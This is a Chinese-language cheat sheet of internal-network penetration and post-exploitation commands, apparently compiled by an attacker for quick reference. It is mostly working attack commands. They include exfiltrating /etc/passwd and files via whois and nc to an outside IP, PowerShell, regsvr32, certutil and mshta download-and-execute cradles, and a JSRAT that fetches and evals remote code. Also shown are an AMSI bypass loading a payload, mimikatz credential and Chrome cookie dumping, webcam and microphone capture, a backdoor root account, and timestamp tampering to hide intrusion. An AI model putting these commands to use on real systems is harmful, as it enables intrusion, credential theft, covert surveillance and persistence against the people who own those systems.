整合了一些常用的用于内网渗透的时候使用的一些命令,用于备忘和查找。

一条命令揪出ssh登录者物理地址

1

for i in grep 'sshd' /var/log/auth.log* |grep 'Accepted' |grep ftp| grep -oE  '\<([1-9]|[1-9][0-9]|1[0-9]{2}|2[01][0-9]|22[0-3])\>(\.\<([0-9]|[0-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\>){2}\.\<([1-9]|[0-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-4])\>' | sort  | uniq; do curl  -s --header "X-Forwarded-For: i" http://1212.ip138.com/ic.asp |iconv -c -f GB2312 -t utf-8 | grep -o -P '(?<=<center>您的IP是:).*(?=<\/center)' ; done

此条命令可获取所有存储在注册表中包含密码的键值

1
2
3
4
5

REG query HKCU  /v "pwd" /s  #pwd可替换为password \ HKCU 可替换为HKCR

powerup.ps1用于进行提权检测,这个脚本会查找 所在服务器的 服务 ,dll ,第三方等 可提权的漏洞信息

powershell  IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks

扫描存活主机脚本

使用方法 ./xxx.sh 192.168.10 > IP

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

#!/bin/bash
is_alive_ping()
{
  ping -c 1 1 > /dev/null
  [ ? -eq 0 ] && echo i
}
read -p "IP[1.2.3]" IP
for i in IP.{1..254} 
do
is_alive_ping i & disown
done

内网C段存活主机查找

for /l %i in (1,1,255) do @ping 10.0.1.%i -w 1 -n 1 | find /i "ttl"

找主机名

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"

B段查找,因为在一个内网里面有时候不一定只有一个域,而当两个域没有信任时,可以用这条扫出来

for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

找域机器对应IP

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

端口扫描脚本

使用方法是直接运行该python程序, 比如保存为test.py ,直接运行 python test.py ,不过前提是你需要有IP文件,即就是第一步中你用shell脚本生成的IP列表

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

import threading,os,time
def ncDetect(IP):
    command = "nc -v -z " + IP +" 21-9000 2>&1| grep succeed"
    f = os.system(command)
    

IPHandle = open("IP","r")
test = IPHandle.readline()
test = test.strip('\n')
while test:
    for i in range(5):
        t = threading.Thread(target=ncDetect,args=(test,))
        t.start()
        test = IPHandle.readline()
        test = test.strip('\n')
    time.sleep(5)
    test = IPHandle.readline()
    test = test.strip('\n')
exit(0)

icmp扫描

基于icmp的各种内网主机发现方式,如果防火墙过滤的icmp请求,这种方式基本就废了,但是基本上都不会过滤icmp协议的请求。除了本身自带的命令,也可以考虑使用第三方程序,比如cping

在win下使用icmp扫描

  • cmd中执行如下命令,对整个C段进行ping扫描

    1

    for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"

  • B 段查找

    1

    for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

另外findstr /i “pinging”findstr /i “ping” 可以换成findstr “[” 的 可以适合多语言环境

  • 利用powershell对目标内网进行icmp扫描

    1
2
3

    powershell.exe -exec bypass -Command "Import-Module C:\Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.3.1 -EndAddress 192.168.3.254 -ResolveHost -ScanPort -Port 21,22,23,25,53,80,81,82,83,84,85,86,87,88,89,110,111,143,389,443,445,873,1025,1433,1521,2601,3306,3389,3690,5432,5900,7001,8000,8080,8081,8082,8083,8084,8085,8086,8087,8089,9090,10000"  

目标网段,并非仅限C段,比如你也可以写成这种方式`192.168.3.1 - 192.168.31.254`

在linux下使用各类icmp扫描

  • 最简单的方式,将下面的代码保存至shell中,赋予其执行权限,执行该脚本即可

    1
2
3
4
5
6
7
8

    #!/bin/bash
for ip in 192.168.1.{1..254} 
do 
	ping ip -c 1 &> /dev/null 
		if [ ? -eq 0 ];then 
			echo ip is alive .... 
		fi 
done

  • nmap的icmp扫描

    1

    nmap -sn -PE 192.168.1.0/24

arp扫描

在win下使用各种arp扫描

1
2
3

start /b arpscan.exe -t 192.168.1.0/24 >> result.txt

powershell.exe -exec bypass -Command "Import-Module C:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24"  >> result.txt

在 linux 下使用 arp 扫描

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# wget https://nmap.org/dist/nmap-7.40.tar.bz2
# bzip2 -cd nmap-7.40.tar.bz2 | tar xvf -
# cd nmap-7.40 
# ./configure  这里可以用--prefix指定安装路径
# echo ?
# make
# make install
# echo ?
# make install
# echo ?	
# nmap -sn -PR 192.168.1.0/24  尝试arp扫描

  • 处在别人的vpn内网(kali)

     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

    netdiscover -r 192.168.1.0/24 -i eth0

msf的arp扫描模块

msf > use  auxiliary/scanner/discovery/arp_sweep
msf > show options
msf > set  interface eth0
msf > set  smac 00:0c:29:92:fd:85
msf > set  rhosts 192.168.1.0/24
msf > set  threads 20
msf > set  shost 192.168.1.27
msf > run

  • meterpreter

    1
2
3

    meterpreter > getsystem 	另外,在目标机器上扫描时,务必先提权(个人建议,会方便很多),不然扫描过程中可能会有些问题
meterpreter > run autoroute -s 192.168.1.0/24
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

基于smb和netbios的内网主机发现方式

win下:

1

nbtscan.exe -m  192.168.1.0/24   非常经典的小工具

linux下:

1
2
3
4
5
6

wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgz
tar -zxvf nbtscan-source-1.0.35.tgz
make
echo ?
./nbtscan -h
./nbtscan -m 192.168.1.0/24

域内扫描

1
2

net view
dsquery computer  其实,域内最好用的也就是nbtscan了

Ps:如果计算机名很多的时候,可以利用bat批量ping获取ip

1
2
3
4
5
6
7

@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (
@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (
@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k  %%j)
)
)

各种脚本语言不同版本一句话开启 HTTP 服务器的总结

Python 2.x

python -m SimpleHTTPServer 8000

Python 3.x

python -m http.server 8000

Twisted (Python)

twistd -n web -p 8000 --path .

Or:

python -c 'from twisted.web.server import Site; from twisted.web.static import File; from twisted.internet import reactor; reactor.listenTCP(8000, Site(File("."))); reactor.run()'

Ruby

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'

Ruby 1.9.2+

ruby -run -ehttpd . -p8000

adsf (Ruby)

gem install adsf # install dependency
adsf -p 8000

Sinatra (Ruby)

gem install sinatra # install dependency
ruby -rsinatra -e'set :public_folder, "."; set :port, 8000'

Perl

 cpan HTTP::Server::Brick # install dependency
 perl -MHTTP::Server::Brick -e 's=HTTP::Server::Brick->new(port=>8000); s->mount("/"=>{path=>"."}); s->start'

Plack (Perl)

 cpan Plack # install dependency
 plackup -MPlack::App::Directory -e 'Plack::App::Directory->new(root=>".");' -p 8000

Mojolicious (Perl)

 cpan Mojolicious::Lite # install dependency
 perl -MMojolicious::Lite -MCwd -e 'app->static->paths->[0]=getcwd; app->start' daemon -l http://*:8000

http-server (Node.js)

 npm install -g http-server # install dependency
 http-server -p 8000

node-static (Node.js)

 npm install -g node-static # install dependency
 static -p 8000

PHP (>= 5.4)

 php -S 127.0.0.1:8000

Erlang

erl -s inets -eval 'inets:start(httpd,[{server_name,"NAME"},{document_root, "."},{server_root, "."},{port, 8000},{mime_types,[{"html","text/html"},{"htm","text/html"},{"js","text/javascript"},{"css","text/css"},{"gif","image/gif"},{"jpg","image/jpeg"},{"jpeg","image/jpeg"},{"png","image/png"}]}]).'

busybox httpd

busybox httpd -f -p 8000

webfs

webfsd -F -p 8000

IIS Express

C:> "C:\Program Files (x86)\IIS Express\iisexpress.exe" /path:C:\MyWeb /port:8000

Whois

接受端:

1

nc -vlnp 8000 | sed "s/ //g" | base64 -d

发送端:

1

whois -h 47.107.82.71 -p 8000 `cat /etc/passwd | base64`

NC

接收端:

1
2
3

nc -lvvp 8000 > test.txt

cat < /dev/tcp/10.10.10.200/8000 > 1.txt

发送端:

1
2
3

cat test.txt | nc  47.107.82.71 8000

nc 47.107.82.71 8000 < 10000.txt

SMB

impacket工具下载

kali中已集成该工具

1
2

 #在当前目录启动 SMB server,共享名称为 share
 impacket-smbserver share `pwd`

下载文件:

1

copy \\IP\ShareName\File.exe file.exe

上传文件:

1
2
3

net use x: \\IP\ShareName
copy file.txt x:
net use x: /delete

Bash

接收端

1

nc -lvnp 8000 > test.txt

发送端

1

cat test.txt > /dev/tcp/ip/port

Linux

Linux反弹shell后,方便的交互:

python -c 'import pty; pty.spawn("/bin/bash")'

无python时:

expect -c 'spawn bash;interact'

无wget nc等下载工具时下载文件

exec 5<>/dev/tcp/sec-lab.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl

修改上传文件时间戳(掩盖入侵痕迹)

touch -r 老文件时间戳 新文件时间戳

利用BASH提权

这个要求管理员有su的习惯,我们可以通过它来添加一个id=0的用户 PROMPT_COMMAND 利用这个变量保存了在主提示符PS1显示之前需要执行的命令 导入:

export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”

lsof 命令

lsof 1.txt 显示开启文件 abc.txt 的进程
lsof -i :22 知道 22 端口现在运行什么程序
lsof -c nsd 显示 nsd 进程现在打开的文件
lsof -g gid 显示归属 gid 的进程情况
lsof +d /usr/local/ 显示目录下被进程开启的文件
lsof +D /usr/local/ 同上,但是会搜索目录下的目录,时间较长
lsof -d 4 显示使用 fd 为4 的进程
lsof -i 用以显示符合条件的进程情况

SSH端口转发

下面文章详细描述了3种方式转发 https://www.cnblogs.com/david-zhang-index/archive/2012/08/18/2645943.html

plink用法

plink.exe root@10.10.10.100 -batch -pw 123456 -c "uname -a"
E:>plink.exe root@10.10.10.100 -batch -pw 123456 -c "uname -a"
Linux CentOS6 2.6.32-642.el6.i686 #1 SMP Tue May 10 16:13:51 UTC 2016 i686 i686 i386 GNU/Linux

图片马

1

Exiftool “-comment<=raj.php” 1.png

Windows

Powershell

获取无线密码:

1

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Get-WLAN-Keys.ps1');Get-Wlan-Keys "

提权加账号

1

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

下载执行:

1

powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://b.hiphotos.baidu.com/image/pic/item/d009b3de9c82d15825ffd75c840a19d8bd3e42da.jpg','C:\Users\Public\test.jpg') & start C:\Users\Public\test.jpg

摄像头录像:

1

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/MiniEye.ps1'); Capture-MiniEye -RecordTime 2 -Path env:temp\hack.avi"

录音:

1

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1');Get-MicrophoneAudio -Path env:TEMP\secret.wav -Length 10 -Alias 'SECRET'"

MSHTA

VBSCRIPT EXEC

1

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JAVASCRIPT EXEC

1

mshta javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

JSRAT

1

mshta javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Bypass AMSI

1

PS C:> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue(null,true)

use:

1

powershell.exe -ExecutionPolicy Bypass -noprofile [Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue(null,true);iex(New-Object Net.WebClient).DownloadString(''http://192.168.230.1/msfpayload.ps1'')

Bypass AV

sqlite3.exe -cmd "select load_extension('1.txt','EP')"
sqlite3.exe -cmd "select load_extension('\192.168.1.101\share\1.txt','EP')"
mimikatz

获取vpn密码

1

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

读取chrome cookies

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit

命令行下载

certutil

certutil -urlcache -split -f example.com/file

certutil -urlcache -split -f http://ip:8000/10000.txt d:\1234.txt&&d:\1234.txt

今天偶然利用此命令干成了大事,老司机一看就懂 命令用法百度搜到的,希望对各位表哥有用

echo 48 65 6C 6C 6F 2C 57 6F 72 6C 64 21 >hex.txt

生成 hex.txt,机器码对应的内容是 Hallo World!

certutil -decodehex hex.txt bin.txt Hex2Bin

certutil -encode bin.txt Encode.txt Base64_Encode

certutil -decode Encode.txt Decode.txt Base64_Decode

powshell

powershell (new-object System.Net.WebClient).DownloadFile('http://ip/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'

bitsadmin

1

 bitsadmin /transfer n http://ip:8000/10000.txt d:\12345.txt && d:\12345.txt

regsvr32

1

regsvr32 /u /s /i:http://ip/5.exe scrobj.dll

curl

1

curl http://ip:8000/10000.txt

wget

1

wget http://ip:8000/10000.txt -O 1.txt

awk

1
2
3
4
5
6
7
8

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/8000"
  print "GET /10000.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'